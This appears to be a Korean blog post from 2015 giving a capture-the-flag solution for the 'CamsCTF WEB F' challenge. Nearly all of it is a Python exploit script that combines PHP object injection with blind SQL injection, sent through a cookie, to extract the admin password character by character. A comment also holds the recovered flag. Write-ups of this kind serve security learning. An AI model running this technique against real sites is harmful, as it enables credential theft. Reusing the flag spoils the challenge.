웹해킹

CamsCTF WEB F

dladbru 2015. 6. 4. 05:14 
#!/usr/bin/python
########################################
###PHP Object Injection+SQL Injection###
########################################

from base64 import *
import StringIO
import pycurl
import time

key=""

def serial(s):
        slen=len(s)+1
        return b64encode("""O:5:"Login":1:{s:12:"\x00Login\x00table";s:%d:"%s#";}"""% (slen,s))


print "Start!"
curl = pycurl.Curl()


attackurl="http://web.camsctf.com/f/admin.php"

#sqL+%bj3c7!=FuN
for i in range(1,20): #length
        for loop in range(127,32,-1): 
            SC = StringIO.StringIO()

            header= ["Cookie:data=%s"%serial("login where username='admin' and if(ord(substr(password,%d,1))=%d,1,0)"%(i,loop))]
            
            curl.setopt(pycurl.URL, attackurl)
            curl.setopt(pycurl.HTTPHEADER, header)
            curl.setopt(pycurl.WRITEFUNCTION, SC.write)
            curl.setopt(pycurl.FOLLOWLOCATION,1)
            try:
                    curl.perform()
                    html = SC.getvalue()
                    if(html=="1"):
                        key+=chr(loop)
                        break
                    SC.close()
            except Exception, e:
                    print "Exception : %s"% e
        print key
반응형